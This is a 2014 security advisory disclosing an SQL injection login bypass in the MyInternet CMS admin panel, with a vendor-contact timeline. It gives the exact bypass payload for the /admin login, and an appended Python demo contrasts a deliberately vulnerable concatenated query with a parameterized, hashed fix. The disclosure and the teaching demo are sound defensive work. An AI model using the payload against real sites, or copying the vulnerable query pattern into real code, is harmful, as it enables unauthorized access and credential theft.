MyInternet CMS SQL injection in admin panel

MyInternet admin panel login bypass

I contacted the company via email reporting that I have found a critical vulnerability affecting some of their customers.

They didn't reply back and I decided to make a call to inform the company about the vulnerability. I explained the impact and they answered "I don't care, I have more interesting things to do".

Vulnerability details

Vendor: My Internet
Affected Product: MyInternet CMS
Reported by: Evangelos Mourikis
Contact: vag.mourikis () gmail [dot] com

Timeline

1st contact via email | 8 July 2014 (no answer)
2nd contact via phone | 30 July 2014

Public disclosure | 4 September 2014

Impact

This vulnerability allows a malicious user to gain access to the administration panel. That means they can edit all the pages, read the plaintext passwords of the admin panel users and upload PDF files.

Vulnerability

The administration panel is located at http://[URL]/admin

Username: admin
Password: ' or 1=1-- -
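As an added illustration that is not part of the original advisory and not MyInternet's code: a small Python/sqlite3 model of the login check. It assumes the classic pattern behind this class of bug, user input spliced into the SQL text, and shows the parameterized, hashed-password version beside it; the user table and its password are constructed for the example.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000


def make_db():
    # Constructed in-memory table standing in for a CMS user store; not the
    # product's real schema. The plaintext column mirrors the advisory's
    # observation that admin passwords were readable once inside the panel.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", b"correct horse", salt, PBKDF2_ROUNDS)
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("admin", "correct horse", salt, pw_hash))
    db.commit()
    return db


def login_vulnerable(db, username, password):
    # Assumed weak pattern: input concatenated into the query. A password of
    # "' or 1=1-- -" closes the string, makes the WHERE clause always true and
    # comments out the trailing quote, so any row satisfies the login.
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return db.execute(query).fetchone() is not None


def login_hardened(db, username, password):
    # Parameterized lookup: the input is bound as data and never parsed as SQL.
    # Only a salted PBKDF2 hash is stored, so a panel compromise no longer
    # exposes plaintext credentials, and the comparison is constant-time.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored_hash = row
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, stored_hash)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected:", login_vulnerable(db, "admin", "' or 1=1-- -"))
    print("hardened, injected:  ", login_hardened(db, "admin", "' or 1=1-- -"))
    print("hardened, real pw:   ", login_hardened(db, "admin", "correct horse"))
```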